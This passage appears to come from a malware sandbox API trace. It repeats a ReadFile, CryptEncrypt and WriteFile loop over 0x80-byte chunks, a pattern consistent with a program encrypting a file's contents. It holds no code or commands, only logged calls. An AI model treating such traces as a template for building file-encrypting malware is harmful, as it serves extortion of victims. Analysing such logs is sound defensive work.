nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.928] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.928] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.928] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.928] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.928] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.928] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.928] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.929] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.929] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.929] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.929] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.929] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.929] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.929] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.929] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.929] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.929] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.930] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.930] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.930] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.930] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.930] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.930] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.930] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.930] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.930] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.930] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.930] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.930] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.930] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.931] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.931] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.931] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.931] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.931] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.931] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.931] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.931] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.931] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.931] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.931] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.931] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.931] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.931] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.931] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.931] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.931] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.931] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.932] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.932] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.932] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.932] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.932] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.932] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.932] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.932] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.932] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.932] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.932] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.932] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.932] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.932] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.932] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.932] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.932] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.932] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.933] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.933] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.933] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.933] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.933] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.933] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.933] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.933] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.933] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.933] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.933] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.934] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.934] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.934] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.934] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.934] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.934] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.934] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.934] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.934] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.934] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.934] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.934] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.934] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.934] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.934] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.934] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.934] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.935] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.935] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.935] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.935] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.935] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.935] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.935] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.935] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.935] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.935] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.935] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.935] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, 